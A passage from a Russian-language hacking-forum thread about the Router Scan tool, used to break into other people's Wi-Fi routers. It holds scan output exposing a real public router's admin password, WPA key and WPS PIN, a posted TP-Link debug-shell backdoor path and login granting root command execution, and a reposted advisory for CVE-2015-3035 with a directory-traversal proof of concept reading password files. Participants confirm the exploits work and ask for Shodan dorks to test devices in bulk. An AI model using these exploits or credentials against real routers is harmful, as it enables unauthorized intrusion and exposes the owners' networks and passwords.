прога Router Scan

Discussion in 'Беспроводные технологии/Wi-Fi/Wardriving' started by СЕРЖ32, 11 Nov 2013.

  1. Felis-Sapiens

    Felis-Sapiens Reservists Of Antichat

    Joined:
    21 Jul 2015
    Messages:
    616
    Likes Received:
    3,833
    Reputations:
    171
  2. Upsurt

    Upsurt Member

    Joined:
    16 Aug 2015
    Messages:
    103
    Likes Received:
    45
    Reputations:
    0
    #1782 Upsurt, 24 Dec 2015
    Last edited: 24 Dec 2015
    sha9, poor_Yorick and binarymaster like this.
  3. binarymaster

    binarymaster Elder - Старейшина

    Joined:
    11 Dec 2010
    Messages:
    4,717
    Likes Received:
    10,195
    Reputations:
    126
    #1783 binarymaster, 24 Dec 2015
    Last edited: 25 Dec 2015
    sha9, poor_Yorick, Payer and 2 others like this.
  4. henri2002

    henri2002 Active Member

    Joined:
    25 Sep 2013
    Messages:
    379
    Likes Received:
    282
    Reputations:
    3
    Address: http://92.242.118.21:88/
    Time: 0 ms
    Authorization: admin:Lg08cObr
    Device: D-Link DIR-320, hardware: rev 2B1, firmware: 1.22

    хотя в ручную заходит, правда при серфинге по веб морде постоянно требует подтверждения пароля.
    если надо config файл сохранил.
     
  5. binarymaster

    binarymaster Elder - Старейшина

    Joined:
    11 Dec 2010
    Messages:
    4,717
    Likes Received:
    10,195
    Reputations:
    126
    Несколькими постами ранее уже говорил, дело в капче.

    Если одновременно со сканом залогиниться с корректной капчей, парсинг прокатит.
    Code:
    Address: http://92.242.118.21:88/
    Time: 109 ms
    Authorization: admin:Lg08cObr
    Device: D-Link DIR-320, hardware: rev 2B1, firmware: 1.22
    BSSID: 00:24:01:B1:58:C6
    ESSID: 1824
    Security type: WPA/WPA2
    Key: Lg08cObr
    WPS Pin: 68438470
    LAN IP: 192.168.0.1
    LAN Subnet Mask: 255.255.255.0
    WAN IP: 172.18.5.53
    WAN Subnet Mask: 255.255.255.0
    WAN Gateway: 172.18.5.1
    Domain Name Servers: 172.18.5.1 8.8.4.4
     
    Upsurt, sha9 and Triton_Mgn like this.
  6. sha9

    sha9 Well-Known Member

    Joined:
    25 Sep 2015
    Messages:
    568
    Likes Received:
    735
    Reputations:
    2
    доброго времени суток. заранее прошу извинить - у меня такой, несколько тупой вопрос :) вы добавляете эксплойты в текущую сборку ( ну ту, которая в архиве на сайте), или в разрабатываемую, которая еще не в паблике?
     
    #1786 sha9, 25 Dec 2015
    Last edited: 25 Dec 2015
    Nem0 likes this.
  7. Upsurt

    Upsurt Member

    Joined:
    16 Aug 2015
    Messages:
    103
    Likes Received:
    45
    Reputations:
    0
    binarymaster and sha9 like this.
  8. Mednik

    Mednik Member

    Joined:
    23 Nov 2015
    Messages:
    153
    Likes Received:
    71
    Reputations:
    1
    #1788 Mednik, 25 Dec 2015
    Last edited: 25 Dec 2015
    binarymaster, sha9 and Upsurt like this.
  9. sha9

    sha9 Well-Known Member

    Joined:
    25 Sep 2015
    Messages:
    568
    Likes Received:
    735
    Reputations:
    2
    может кому пригодится.
    извиняюсь, если баян :)
    " дебаг-шелл в устройствах TP-Link WDR740ND, WDR740N, WR743ND, WR842ND, WA-901ND, WR941N, WR941ND, WR1043ND, WR2543ND, MR3220, MR3020, WR841N "
    Данная уязвимость позволяет злоумышленнику выполнить произвольный код с root правами. Для эксплуатации уязвимости злоумышленнику достаточно: сформировать HTTP-запрос к /userRpmNatDebugRpm26525557/linux_cmdline.html использовать учётную запись логин osteam, пароль 5up дальше можно выполнять произвольный код с root-правами

    Источник: http://weblance.com.ua/blog/160-kriticheskaya-uyazvimost-v-routerah-i-tochkah-dostupa-tp-link.html

    [​IMG]

    Источник: http://weblance.com.ua/blog/160-kriticheskaya-uyazvimost-v-routerah-i-tochkah-dostupa-tp-link.html
     
  10. sha9

    sha9 Well-Known Member

    Joined:
    25 Sep 2015
    Messages:
    568
    Likes Received:
    735
    Reputations:
    2
    еще один вопрос возник по ходу дела - никому не попадался роутер TP-LINK TL-WR741ND (Hardware version 5.0) именно v.50. хотелось бы проверить эксплойтик http://www.securityfocus.com/archive/1/archive/1/535240/100/0/threaded на других прошивках срабатывает но не так как нужно. отдает php с кодом 1. неохота возиться с инклудом.хочется -раз-и в дамках :)

    для интересующихся, но не ходящих ( по ссылкам разумеется :) )

    title: Unauthenticated Local File Disclosure
    product: Multiple TP-LINK products (see Vulnerable / tested versions)
    vulnerable version: Multiple (see Vulnerable / tested versions)
    fixed version: see Solution
    CVE number: CVE-2015-3035
    impact: Critical
    homepage: http://tp-link.com
    found: 2015-02-19
    by: Stefan Viehböck (Office Vienna)
    SEC Consult Vulnerability Lab

    An integrated part of SEC Consult
    Berlin - Frankfurt/Main - Montreal - Singapore
    Vienna (HQ) - Vilnius - Zurich

    https://www.sec-consult.com

    =======================================================================

    Vendor description:
    -------------------
    "TP-LINK is a global provider of SOHO & SMB networking products and the World's
    No.1 provider of WLAN products, with products available in over 120 countries
    to tens of millions customers. Committed to intensive R&D, efficient production
    and strict quality management, TP-LINK continues to provide award-winning
    networking products in Wireless, ADSL, Routers, Switches, IP Cameras, Powerline
    Adapters, Print Servers, Media Converters and Network Adapters for Global
    end-users."

    Source: http://www.tp-link.us/about/?categoryid=102

    Business recommendation:
    ------------------------
    Attackers can read sensitive configuration files without prior authentication.
    These files e.g. include the administrator credentials and the WPA passphrase.

    TP-LINK has provided fixed firmware which should be installed immediately.

    Vulnerability overview/description:
    -----------------------------------
    Because of insufficient input validation, arbitrary local files can be
    disclosed. Files that include passwords and other sensitive information can
    be accessed.

    Proof of concept:
    -----------------
    The following HTTP request shows how directory traversal can be used to gain
    access to files without prior authentication:
    ========================================================================
    =======
    GET /login/../../../etc/passwd HTTP/1.1
    Host: $host

    ========================================================================
    =======

    The server response includes the contents of the file:
    ========================================================================
    =======
    HTTP/1.1 200 OK
    Server: Router Webserver
    Connection: Keep-Alive
    Keep-Alive:
    Persist:
    WWW-Authenticate: Basic realm="TP-LINK Wireless Dual Band Gigabit Router WDR4300"
    Content-Length: 683
    Content-Type: text/html
    root:x:0:0:root:/root:/bin/sh
    Admin:x:0:0:root:/root:/bin/sh
    bin:x:1:1:bin:/bin:/bin/sh
    daemon:x:2:2:daemon:/usr/sbin:/bin/sh
    adm:x:3:4:adm:/adm:/bin/sh
    lp:x:4:7:lp:/var/spool/lpd:/bin/sh
    sync:x:5:0:sync:/bin:/bin/sync
    shutdown:x:6:11:shutdown:/sbin:/sbin/shutdown
    halt:x:7:0:halt:/sbin:/sbin/halt
    uucp:x:10:14:uucp:/var/spool/uucp:/bin/sh
    operator:x:11:0:Operator:/var:/bin/sh
    nobody:x:65534:65534:nobody:/home:/bin/sh
    ap71:x:500:0:Linux User,,,:/root:/bin/sh
    dropbear:x:500:500:dropbear:/tmp/dropbear:/bin/sh
    admin:x:500:500:admin:/home:/bin/sh
    guest:x:500:500:guest:/home:/bin/sh
    dropbear:x:500:500:dropbear:/tmp/dropbear:/bin/sh
    dropbear:x:500:500:dropbear:/tmp/dropbear:/bin/sh
    ========================================================================
    =======

    Several sensitive files can be read. These include:
    Files containing Wi-Fi configuration including WPA-passphrase:
    /login/../../../tmp/ath.ap_bss
    /login/../../../tmp/ath1.ap_bss

    A file containing administrator credentials (format: $user:md5($password), which can
    be brute-forced very efficiently:
    /login/../../../tmp/dropbear/dropbearpwd

    Example server response:
    ========================================================================
    =======
    HTTP/1.1 200 OK
    Server: Router Webserver
    Connection: Keep-Alive
    Keep-Alive:
    Persist:
    WWW-Authenticate: Basic realm="TP-LINK Wireless Dual Band Gigabit Router WDR4300"
    Content-Length: 56
    Content-Type: text/html
    username:admin
    password:11d0fc2ff3e7862d8a3f9b280e6d390c
    ========================================================================
    =======

    Vulnerable / tested versions:
    -----------------------------
    The vulnerability affects the following products:
    TP-LINK Archer C5 (Hardware version 1.2)
    TP-LINK Archer C7 (Hardware version 2.0)
    TP-LINK Archer C8 (Hardware version 1.0)
    TP-LINK Archer C9 (Hardware version 1.0)
    TP-LINK TL-WDR3500 (Hardware version 1.0)
    TP-LINK TL-WDR3600 (Hardware version 1.0)
    TP-LINK TL-WDR4300 (Hardware version 1.0)
    TP-LINK TL-WR740N (Hardware version 5.0)
    TP-LINK TL-WR741ND (Hardware version 5.0)
    TP-LINK TL-WR841N (Hardware version 9.0)
    TP-LINK TL-WR841N (Hardware version 10.0)
    TP-LINK TL-WR841ND (Hardware version 9.0)
    TP-LINK TL-WR841ND (Hardware version 10.0)

    Vendor contact timeline:
    ------------------------
    2015-02-19: Contacting vendor through support (at) tp-link (dot) com. [email concealed]
    2015-02-24: Resending email as previous ticket has been closed by TP-LINK.
    2015-02-24: Contacting technical support engineer of TP-LINK, contact received
    by 3rd party.
    2015-02-25: Requesting encryption keys, providing affected models.
    2015-02-26: No encryption keys available, sending advisory in unencrypted form.
    2015-02-28: Vendor confirms vulnerability, provides beta firmware.
    2015-03-03: Sending confirmation that beta firmware fixes the vulnerability.
    2015-03-06: Vendor is working on release schedule, affected devices.
    2015-03-16: Vendor announces that fixed firmware will be released by the end of
    March.
    2015-03-24: Vendor confirms that firmware releases are on schedule.
    2015-04-08: Vendor provides final list of affected products & download URLs.
    2015-04-10: Coordinated release of security advisory.

    Solution:
    ---------
    Update to the most recent firmware version:
    TP-LINK Archer C5 (Hardware version 1.2): http://www.tp-link.com/en/handlers/download.ashx?resourceid=13048
    TP-LINK Archer C7 (Hardware version 2.0): http://www.tp-link.com/en/handlers/download.ashx?resourceid=13008
    TP-LINK Archer C8 (Hardware version 1.0): http://www.tp-link.com/en/handlers/download.ashx?resourceid=13052
    TP-LINK Archer C9 (Hardware version 1.0): http://www.tp-link.com/en/handlers/download.ashx?resourceid=13020
    TP-LINK TL-WDR3500 (Hardware version 1.0): http://www.tp-link.com/en/handlers/download.ashx?resourceid=13018
    TP-LINK TL-WDR3600 (Hardware version 1.0): http://www.tp-link.com/en/handlers/download.ashx?resourceid=13019
    TP-LINK TL-WDR4300 (Hardware version 1.0): http://www.tp-link.com/en/handlers/download.ashx?resourceid=13009
    TP-LINK TL-WR740N (Hardware version 5.0): http://www.tp-link.com/en/handlers/download.ashx?resourceid=13012
    TP-LINK TL-WR741ND (Hardware version 5.0): http://www.tp-link.com/en/handlers/download.ashx?resourceid=13013
    TP-LINK TL-WR841N (Hardware version 9.0): http://www.tp-link.com/en/handlers/download.ashx?resourceid=13033
    TP-LINK TL-WR841N (Hardware version 10.0): http://www.tp-link.com/en/handlers/download.ashx?resourceid=13036
    TP-LINK TL-WR841ND (Hardware version 9.0): http://www.tp-link.com/en/handlers/download.ashx?resourceid=13035
    TP-LINK TL-WR841ND (Hardware version 10.0): http://www.tp-link.com/en/handlers/download.ashx?resourceid=13037

    Workaround:
    -----------
    See solution.

    Advisory URL:
    -------------
    https://www.sec-consult.com/en/Vulnerability-Lab/Advisories.htm

    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

    SEC Consult Vulnerability Lab

    SEC Consult
    Berlin - Frankfurt/Main - Montreal - Singapore - Vienna (HQ) - Vilnius - Zurich

    About SEC Consult Vulnerability Lab
    The SEC Consult Vulnerability Lab is an integrated part of SEC Consult. It
    ensures the continued knowledge gain of SEC Consult in the field of network
    and application security to stay ahead of the attacker. The SEC Consult
    Vulnerability Lab supports high-quality penetration testing and the evaluation
    of new offensive and defensive technologies for our customers. Hence our
    customers obtain the most current information about vulnerabilities and valid
    recommendation about the risk profile of new technologies.

    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    Interested to work with the experts of SEC Consult?
    Send us your application https://www.sec-consult.com/en/Career.htm

    Interested in improving your cyber security with the experts of SEC Consult?
    Contact our local offices https://www.sec-consult.com/en/About/Contact.htm
    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

    Mail: research at sec-consult dot com
    Web: https://www.sec-consult.com
    Blog: http://blog.sec-consult.com
    Twitter: https://twitter.com/sec_consult

    EOF Stefan Viehböck / @2015

    -----BEGIN PGP SIGNATURE-----
    Version: GnuPG v2

    iQIcBAEBCAAGBQJVJ7e/AAoJEC0t17XG7og/9sAP/RmVaLHdZNLVdaM6fOGqOfcx
    WTj3TpN5k8D5e0ZyDbWznsN8UHdvyAW8aXexjHlYJUeiy1syOSDXmohVGi4rmuKB
    EmuFrLsZeE2dqlST5QjUZpPDuSm70GUPi87CjJtPZpfYkpJMKD/4YaXXgHpzjbZI
    N++ALNNfN2MPtEMkL0lOa3vCznF5PvCbnMA68pwN6nz6djKpt9fv9086OA4PR+zd
    5fP5vELnc4idWBMvRqUofrbOoHprglHfyV+NC4JJoC8BA9FexVAiJkZsv0I31vHi
    JZtJoHLKxmsTgTEQaifkvZ0Sku02O/tjbflMxpa7pndIPeJ0Nd6YqLC5lwGFdPcp
    HAI/BES0U+Nbtfyp/6MLTm7lej2XL2WSziQUgQPPblcZNykmxFBNVLiPrJp4s/Bx
    /Pf0iFHA9ycNkssxdH3+eRbYQBY9SXDsd+2ks3TqcNFo82c1shKm4MXVzgpxoDDi
    qcN2fQZcPHSSMaqIy2Y3XfgmPlrktfUjqx+hmwvzdGldtr//5m8h+ksMmEf/+3OF
    AMRkvxhr/VAY9xzX+xPZRC7FuxGby/MNeR2z6OYQYbyxYSNcZpASAyS1C3VofP/u
    K1KZldkimHfJVIxo9+bCAaHJ6jow9XSY+bMo9istunpAXT8xb6wpp/EGP6FJwpsE
    molspBTNPGXlLJnKrzpw
    =G04Q
    -----END PGP SIGNATURE-----

    [ reply ]
     
    Payer, poor_Yorick and Triton_Mgn like this.
  11. fire-dance

    fire-dance Elder - Старейшина

    Joined:
    12 May 2015
    Messages:
    1,005
    Likes Received:
    666
    Reputations:
    12
    хм интересненько сработало на модели TL-WR841N / TL-WR841ND
     
    Payer and sha9 like this.
  12. sha9

    sha9 Well-Known Member

    Joined:
    25 Sep 2015
    Messages:
    568
    Likes Received:
    735
    Reputations:
    2
    потому и выложил, что проверил :) только тестил на 740N
     
    #1792 sha9, 25 Dec 2015
    Last edited: 25 Dec 2015
    dremmar likes this.
  13. binarymaster

    binarymaster Elder - Старейшина

    Joined:
    11 Dec 2010
    Messages:
    4,717
    Likes Received:
    10,195
    Reputations:
    126
    В разрабатываемую.
    Оффлайн.

    На будущее: рекомендую также указывать заголовки (Server, Realm, и т.п.), можно даже дорки на Shodan, чтобы пачками тестировать.
    Добавил.
     
    Payer and Upsurt like this.
  14. Upsurt

    Upsurt Member

    Joined:
    16 Aug 2015
    Messages:
    103
    Likes Received:
    45
    Reputations:
    0
    #1794 Upsurt, 25 Dec 2015
    Last edited: 25 Dec 2015
    binarymaster likes this.
  15. trainzment

    trainzment Banned

    Joined:
    31 Oct 2015
    Messages:
    4
    Likes Received:
    10
    Reputations:
    0
  16. binarymaster

    binarymaster Elder - Старейшина

    Joined:
    11 Dec 2010
    Messages:
    4,717
    Likes Received:
    10,195
    Reputations:
    126
    #1796 binarymaster, 25 Dec 2015
    Last edited: 25 Dec 2015
    sha9, dremmar, poor_Yorick and 4 others like this.
  17. binarymaster

    binarymaster Elder - Старейшина

    Joined:
    11 Dec 2010
    Messages:
    4,717
    Likes Received:
    10,195
    Reputations:
    126
    http://rghost.ru/private/8fzd4FZqG/11aab0cbd010ec57ad065fc1fd1e228a

    Сейчас переключился на другой проект, так что залил обновлённые бинарники, с новыми добавленными устройствами, и некоторыми поправками.

    Версию пока не менял.
     
    Sunnych, carartem02, sha9 and 10 others like this.
  18. CRACK211

    CRACK211 Elder - Старейшина

    Joined:
    16 Sep 2009
    Messages:
    1,049
    Likes Received:
    1,127
    Reputations:
    11
    Спасибо вам) за новогодний подарок) а что за проект ? Если не секрет)
     
  19. binarymaster

    binarymaster Elder - Старейшина

    Joined:
    11 Dec 2010
    Messages:
    4,717
    Likes Received:
    10,195
    Reputations:
    126
    Не секрет, но он далеко от тематики этого форума. Если кому интересно:
    Участвую в разработке игры Doom 2D Forever (двумерный платформер под Windows)

    Репозиторий: https://github.com/pss88/DF
    Оф. сайт: http://doom2d.org/
     
  20. Felis-Sapiens

    Felis-Sapiens Reservists Of Antichat

    Joined:
    21 Jul 2015
    Messages:
    616
    Likes Received:
    3,833
    Reputations:
    171
    Это включает исправление определения BSSID у некоторых моделей. Так что в идеале хотелось бы, чтобы все одновременно перешли на обновленную версию, дабы не плодить дубли в базе 3wifi, а уже имеющиеся можно было бы со временем вычистить. К сожалению, в реальности это вряд ли произойдёт...
     
    sha9, Payer, CRACK211 and 2 others like this.